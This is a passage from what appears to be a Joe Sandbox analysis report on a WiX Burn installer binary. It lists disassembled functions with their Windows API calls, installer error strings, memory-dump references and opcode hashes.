                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000001,80000005,00000000,00000000,00000000,00000000,00000003,000007D0), ref: 0041C6F7
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocate access for Administrators group to path: %ls, xrefs: 0041C5AA
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\cache.cpp, xrefs: 0041C682, 0041C6DB
                                                                                                                                                          • Failed to create ACL to secure cache path: %ls, xrefs: 0041C68D
                                                                                                                                                          • Failed to allocate access for Everyone group to path: %ls, xrefs: 0041C606
                                                                                                                                                          • Failed to secure cache path: %ls, xrefs: 0041C6C9
                                                                                                                                                          • Failed to allocate access for Users group to path: %ls, xrefs: 0041C634
                                                                                                                                                          • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 0041C5D8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLocal
                                                                                                                                                          • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 2826327444-470834561
                                                                                                                                                          • Opcode ID: 228288d2f8eed273df2aa2bea0d3c85f32e7eb2d824804abe6238d7d656293ec
                                                                                                                                                          • Instruction ID: 9edcdef0b248b770df6d0c7cd133c19502bec78531f6b9713181f95253eace6e
                                                                                                                                                          • Opcode Fuzzy Hash: 228288d2f8eed273df2aa2bea0d3c85f32e7eb2d824804abe6238d7d656293ec
                                                                                                                                                          • Instruction Fuzzy Hash: 35411831BC032977E73196918C4AFEB3A68AB45F14F114057FA44BE1C1DAE8AD8487ED
                                                                                                                                                          Function 00406640 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 143COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000105,?,0100147D,?,00000105,00000000,00000000,0100147D,?,00000000,004080B0), ref: 004066CF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FullNamePath
                                                                                                                                                          • String ID: Failed to allocate space for full path.$Failed to get current directory.$Failed to get full path for string: %ls$Failed to get max length of input buffer.$Failed to reallocate space for full path.$GetFullPathNameW results never converged.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp
                                                                                                                                                          • API String ID: 608056474-1419090240
                                                                                                                                                          • Opcode ID: 10858c8794c8ec342e243c3eb2aa5b488c9648872b0c41d4a01f010617119a0d
                                                                                                                                                          • Instruction ID: 8114c74297e77a2007bb3c2e90a27a19ecf63bc794c2187d7ec9538bae4fd08f
                                                                                                                                                          • Opcode Fuzzy Hash: 10858c8794c8ec342e243c3eb2aa5b488c9648872b0c41d4a01f010617119a0d
                                                                                                                                                          • Instruction Fuzzy Hash: 6E411A71F8072577E7215A558D4AFAF3A68DB04B64F12407BFD06BB2C1E5BC9C2046AC
                                                                                                                                                          Function 00472838 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00405685: SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000), ref: 004056A3
                                                                                                                                                            • Part of subcall function 00405685: GetLastError.KERNEL32(?,?,?,0041BDC6,00000000,00000000,00000000,00000000,00000000,?,00000001,?,WixBundleOriginalSource,?,?,?), ref: 004056AD
                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004728BC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$ErrorLastPointerWrite
                                                                                                                                                          • String ID: Failed to seek to start point in file.$Failed to write data from internet.$Failed while reading from internet.$UX aborted on cache progress.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$pgG
                                                                                                                                                          • API String ID: 972348794-3678026460
                                                                                                                                                          • Opcode ID: 722c2150fd97aab48190ec923cbf0697e87b5f3f83489e432a6033ad4185aa45
                                                                                                                                                          • Instruction ID: 80ece3e8c31d48d55cfb40e5a672ef59f7cf88f388cc0a66d68d467739eb70c6
                                                                                                                                                          • Opcode Fuzzy Hash: 722c2150fd97aab48190ec923cbf0697e87b5f3f83489e432a6033ad4185aa45
                                                                                                                                                          • Instruction Fuzzy Hash: 0C4128B2B40219BBEB215A45CD45FEF7A68EF00754F15812BFE08B6191D7BCDC0096E8
                                                                                                                                                          Function 0046FA29 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 131registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046F352: lstrlenW.KERNEL32(89F84589,004221A7,00000000,00000000,?,0046F557,00000000), ref: 0046F378
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,004777D8,?,8000FFFF,8000FFFF,00020006,00000000,00000000,00000000,00000000,feclient.dll,00477868,8000FFFF,?), ref: 0046FB83
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Closelstrlen
                                                                                                                                                          • String ID: Failed to allocate the registry key for dependency "%ls".$Failed to create the dependency registry key "%ls".$Failed to set the %ls registry value to "%ls".$Failed to set the %ls registry value to %d.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\deputil.cpp$default$feclient.dll$version.dll
                                                                                                                                                          • API String ID: 3903209405-2782344993
                                                                                                                                                          • Opcode ID: a34b58b9229a006e758f19c144575d864553ceb6d4bdb4dae8e7f6e96b2d0f24
                                                                                                                                                          • Instruction ID: e470559a5fb6620b9ced5f77b3ae1e47d887a16176b67590eac9f136fe6ef8b8
                                                                                                                                                          • Opcode Fuzzy Hash: a34b58b9229a006e758f19c144575d864553ceb6d4bdb4dae8e7f6e96b2d0f24
                                                                                                                                                          • Instruction Fuzzy Hash: F541F472A40318BBDB225F90DC56F9F3F39AB54B50F11013AFA00761A0E2788D20DB9A
                                                                                                                                                          Function 0041202A Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 118COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\search.cpp, xrefs: 004120D5, 004120DA, 004120F7, 00412155
                                                                                                                                                          • Failed to initialize file search., xrefs: 00412053
                                                                                                                                                          • File search: %ls, found directory at path: %ls, xrefs: 00412123
                                                                                                                                                          • File search: %ls, failed get to file attributes. '%ls', xrefs: 004120E5
                                                                                                                                                          • Failed to format variable string., xrefs: 00412080
                                                                                                                                                          • File search: %ls, did not find path: %ls, xrefs: 00412107
                                                                                                                                                          • Failed to set variable., xrefs: 00412143
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to format variable string.$Failed to initialize file search.$Failed to set variable.$File search: %ls, did not find path: %ls$File search: %ls, failed get to file attributes. '%ls'$File search: %ls, found directory at path: %ls$d:\a\wix\wix\src\burn\engine\search.cpp
                                                                                                                                                          • API String ID: 0-2446600326
                                                                                                                                                          • Opcode ID: 00a743e6250d58573940139f4cad41f195cf0ce7cbe81804f62fbb0e1b3a9080
                                                                                                                                                          • Instruction ID: f397e40787b8aa9b6703d37d70d173b2b642689c0419d1560a6d191f2d5b58e5
                                                                                                                                                          • Opcode Fuzzy Hash: 00a743e6250d58573940139f4cad41f195cf0ce7cbe81804f62fbb0e1b3a9080
                                                                                                                                                          • Instruction Fuzzy Hash: 37311C72A4022177D7116A558E4AFEB7A28EF18710F510177FB04F61D1E3F85DA0869D
                                                                                                                                                          Function 004669AA Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 112processCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00466A42
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00466A4C
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 00466AAB
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 00466ABD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                          • String ID: "%ls" %ls$$yG$Failed to allocate full command-line.$Failed to create process: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                          • API String ID: 161867955-3305797711
                                                                                                                                                          • Opcode ID: 39aa812035a4ee3e1fcf553d6edf9f0b6350589ac03a0ebd6325394d8ffa88fd
                                                                                                                                                          • Instruction ID: 275656764bd47e9f66e5ab32577e4aba58f40f237b3c124253cbdc9ec7ea17fc
                                                                                                                                                          • Opcode Fuzzy Hash: 39aa812035a4ee3e1fcf553d6edf9f0b6350589ac03a0ebd6325394d8ffa88fd
                                                                                                                                                          • Instruction Fuzzy Hash: F931A175E00219BBDB119FD5CD45BEFBB78EB05718F114026FA04B6291E3788E44CBAA
                                                                                                                                                          Function 0041953E Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 108COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000008,?,?,00000000,00000000,00000000,00000008,?,00000000,?,?), ref: 00419585
                                                                                                                                                          • ProcessIdToSessionId.KERNEL32(00000000), ref: 0041958C
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to get length of session id string., xrefs: 004195DF
                                                                                                                                                          • Failed to format session id as a string., xrefs: 004195B4
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\logging.cpp, xrefs: 00419645
                                                                                                                                                          • Failed to get temp folder., xrefs: 0041956A
                                                                                                                                                          • %u\, xrefs: 004195A0
                                                                                                                                                          • Failed to copy temp folder., xrefs: 00419633
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CurrentSession
                                                                                                                                                          • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get temp folder.$d:\a\wix\wix\src\burn\engine\logging.cpp
                                                                                                                                                          • API String ID: 2701954971-2964926622
                                                                                                                                                          • Opcode ID: 230fae8221645e749bbedd1f273bc622e12872778d711b78ece17c53be75ff66
                                                                                                                                                          • Instruction ID: 0fbf5a53be4df2ede5d6bbd82a7a163408fafe7c8c2b8077fa836c5f48436e1b
                                                                                                                                                          • Opcode Fuzzy Hash: 230fae8221645e749bbedd1f273bc622e12872778d711b78ece17c53be75ff66
                                                                                                                                                          • Instruction Fuzzy Hash: AE31A771E40219BACF21AA95CD15EDFBFB8EF44750F110167F500B6290D7785E4087A8
                                                                                                                                                          Function 004665B2 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000001,?,?,0040944D), ref: 004666A5
                                                                                                                                                            • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
                                                                                                                                                            • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
                                                                                                                                                          • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 0046663B
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0040944D,?,?,?,?,?,?,?), ref: 00466647
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                                                                                          • String ID: Failed to load ntdll.dll$Failed to load ntdll.dll.$Failed to locate RtlGetVersion.$RtlGetVersion$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\osutil.cpp$ntdll.dll
                                                                                                                                                          • API String ID: 1529210728-1053951979
                                                                                                                                                          • Opcode ID: 58dabcb078f983d08614938ec60f31bfde0609a14d5ba8b8435b21a47ce40de2
                                                                                                                                                          • Instruction ID: 0bb41bfb2cf13b5958723500f2c92caad794eb63a04d8cf28748759e2848c67c
                                                                                                                                                          • Opcode Fuzzy Hash: 58dabcb078f983d08614938ec60f31bfde0609a14d5ba8b8435b21a47ce40de2
                                                                                                                                                          • Instruction Fuzzy Hash: 22216A31B40315BBE7205A54DD86F5B35989B21714F27413BBA04BA2D1F7FC4D0042BD
                                                                                                                                                          Function 0040A215 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 65registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020019,00000002,00000000), ref: 0040A2CD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3535843008-3242702962
                                                                                                                                                          • Opcode ID: c38ce44fa2334fcfd990c4393f9ad2f8d5e9575e95a5350a901e1ce0f8fd7d4b
                                                                                                                                                          • Instruction ID: 0a1ca8c50c0a9579732a568984e86a7cd9f43252987fe1648a8efd670ed8ddb5
                                                                                                                                                          • Opcode Fuzzy Hash: c38ce44fa2334fcfd990c4393f9ad2f8d5e9575e95a5350a901e1ce0f8fd7d4b
                                                                                                                                                          • Instruction Fuzzy Hash: 8A11E731E81320B2EA2166058C0BFDB7924CB10F65F6080BFF908792D1A2BD4A10969E
                                                                                                                                                          Function 00401453 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 45libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,00000000,004018AF,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401466
                                                                                                                                                          • GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 00401472
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004014BD
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004014CE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$ErrorHandleLastModule
                                                                                                                                                          • String ID: Failed to get module handle for kernel32.$SetDefaultDllDirectories$SetDllDirectoryW$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\apputil.cpp$kernel32
                                                                                                                                                          • API String ID: 3392887714-1902336972
                                                                                                                                                          • Opcode ID: 3dce62985b2d8c5eb454e6854f31f511aa0f37df0e4ded713f63b051b5cb358c
                                                                                                                                                          • Instruction ID: c249fd90f0bb3b32ac5b5a075cb26a6e00017ce0c59ff60f1f412a7486bf594e
                                                                                                                                                          • Opcode Fuzzy Hash: 3dce62985b2d8c5eb454e6854f31f511aa0f37df0e4ded713f63b051b5cb358c
                                                                                                                                                          • Instruction Fuzzy Hash: 1801F2B694623067D32117296C0DF9B3E585B50B61F8282B7FA08B62F1D27C084086DC
                                                                                                                                                          Function 004369FD Relevance: 15.2, APIs: 1, Strings: 9, Instructions: 166COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to read API version of BAEngineGetRelatedBundleVariable results., xrefs: 00436AB9, 00436AE2
                                                                                                                                                          • Failed to read variable name of BAEngineGetRelatedBundleVariable args., xrefs: 00436A84
                                                                                                                                                          • Failed to write length of value of BAEngineGetRelatedBundleVariable struct., xrefs: 00436B7C
                                                                                                                                                          • Failed to read API version of BAEngineGetRelatedBundleVariable args., xrefs: 00436A32
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\baengine.cpp, xrefs: 00436B23, 00436BB3
                                                                                                                                                          • Failed to read bundle id of BAEngineGetRelatedBundleVariable args., xrefs: 00436A5B
                                                                                                                                                          • Failed to write size of BAEngineGetRelatedBundleVariable struct., xrefs: 00436B57
                                                                                                                                                          • Failed to write value of BAEngineGetRelatedBundleVariable struct., xrefs: 00436BA1
                                                                                                                                                          • Failed to get related bundle variable: %ls, xrefs: 00436B11
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to get related bundle variable: %ls$Failed to read API version of BAEngineGetRelatedBundleVariable args.$Failed to read API version of BAEngineGetRelatedBundleVariable results.$Failed to read bundle id of BAEngineGetRelatedBundleVariable args.$Failed to read variable name of BAEngineGetRelatedBundleVariable args.$Failed to write length of value of BAEngineGetRelatedBundleVariable struct.$Failed to write size of BAEngineGetRelatedBundleVariable struct.$Failed to write value of BAEngineGetRelatedBundleVariable struct.$d:\a\wix\wix\src\burn\engine\baengine.cpp
                                                                                                                                                          • API String ID: 0-4142968747
                                                                                                                                                          • Opcode ID: 1b67c2ca3fb896949193fc2ec2eb5e678a9b033662f26bac30a797fe815c8570
                                                                                                                                                          • Instruction ID: 43c3291014696fc7e87bb0b7de2b88be54bedb2ef67a3f302f359e0045425fa9
                                                                                                                                                          • Opcode Fuzzy Hash: 1b67c2ca3fb896949193fc2ec2eb5e678a9b033662f26bac30a797fe815c8570
                                                                                                                                                          • Instruction Fuzzy Hash: 02519831E40726BBDF129A94CC06FDFBEB49B08710F114167F914FA1D0E2B9AE109A99
                                                                                                                                                          Function 0040396F Relevance: 15.2, APIs: 4, Strings: 6, Instructions: 163COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
